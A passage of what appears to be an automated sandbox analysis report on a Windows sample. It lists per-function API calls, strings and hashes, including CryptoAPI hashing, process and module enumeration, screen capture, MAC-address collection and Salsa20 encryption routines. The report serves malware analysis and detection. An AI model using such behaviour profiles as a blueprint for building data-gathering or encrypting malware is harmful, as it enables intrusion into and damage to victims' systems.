                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • __tzset_nolock.LIBCMT ref: 0042FB8E
                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                • String ID:
                • API String ID: 1282695788-0
                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1089 427f3d-427f47 call 427e0e 1091 427f4c-427f50 1089->1091
                APIs
                • _doexit.LIBCMT ref: 00427F47
                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$Encode$__lock_doexit
                • String ID:
                • API String ID: 2158581194-0
                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                APIs
                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                • FreeLibrary.KERNEL32(?), ref: 00481C15
                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                • FreeLibrary.KERNEL32(?), ref: 00481D45
                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                • GetTickCount.KERNEL32 ref: 00481F03
                • GetTickCount.KERNEL32 ref: 00481FF1
                • GetTickCount.KERNEL32 ref: 00482066
                • GetTickCount.KERNEL32 ref: 00482095
                • GetTickCount.KERNEL32 ref: 004820FB
                • GetTickCount.KERNEL32 ref: 00482118
                • GetTickCount.KERNEL32 ref: 00482187
                • GetTickCount.KERNEL32 ref: 004821A4
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                • API String ID: 842291066-1723836103
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                • __CxxThrowException@8.LIBCMT ref: 00411026
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                • __CxxThrowException@8.LIBCMT ref: 00411051
                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                • __CxxThrowException@8.LIBCMT ref: 0041107A
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                • __CxxThrowException@8.LIBCMT ref: 004110AB
                • _memset.LIBCMT ref: 004110CA
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                • __CxxThrowException@8.LIBCMT ref: 004110F0
                • _malloc.LIBCMT ref: 00411100
                • _memset.LIBCMT ref: 0041110B
                • _sprintf.LIBCMT ref: 0041112E
                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                • String ID: %.2X
                • API String ID: 2451520719-213608013
                • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                APIs
                • GetLastError.KERNEL32 ref: 00411915
                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                • _memset.LIBCMT ref: 004119B8
                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                • String ID: failed with error
                • API String ID: 4182478520-946485432
                • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                • _memmove.LIBCMT ref: 0040F9EA
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                • _memmove.LIBCMT ref: 0040FADA
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                • _memset.LIBCMT ref: 0040E98E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                • _sprintf.LIBCMT ref: 0040E9D3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                • String ID: %.2X
                • API String ID: 1084002244-213608013
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                • _memset.LIBCMT ref: 0040EBB4
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                • _sprintf.LIBCMT ref: 0040EBF4
                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                • String ID: %.2X
                • API String ID: 1637485200-213608013
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                APIs
                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                • SelectObject.GDI32(?,?), ref: 00482436
                • DeleteObject.GDI32(00000000), ref: 0048243D
                • DeleteDC.GDI32(?), ref: 0048244A
                • DeleteDC.GDI32(?), ref: 00482450
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                • API String ID: 151064509-1805842116
                • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                APIs
                • _malloc.LIBCMT ref: 0040E67F
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040E68B
                • _wprintf.LIBCMT ref: 0040E69E
                • _free.LIBCMT ref: 0040E6A4
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                • _free.LIBCMT ref: 0040E6C5
                • _malloc.LIBCMT ref: 0040E6CD
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                • _sprintf.LIBCMT ref: 0040E720
                • _wprintf.LIBCMT ref: 0040E732
                • _wprintf.LIBCMT ref: 0040E73C
                • _free.LIBCMT ref: 0040E745
                Strings
                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                • Address: %s, mac: %s, xrefs: 0040E72D
                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                • API String ID: 3901070236-1604013687
                • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                • _memmove.LIBCMT ref: 00410427
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                • _memmove.LIBCMT ref: 00410514
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                • String ID:
                • API String ID: 3232302685-0
                • Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                • Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                APIs
                Strings
                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                • input != nullptr && output != nullptr, xrefs: 0040C095
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wassert
                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                • API String ID: 3993402318-1975116136
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
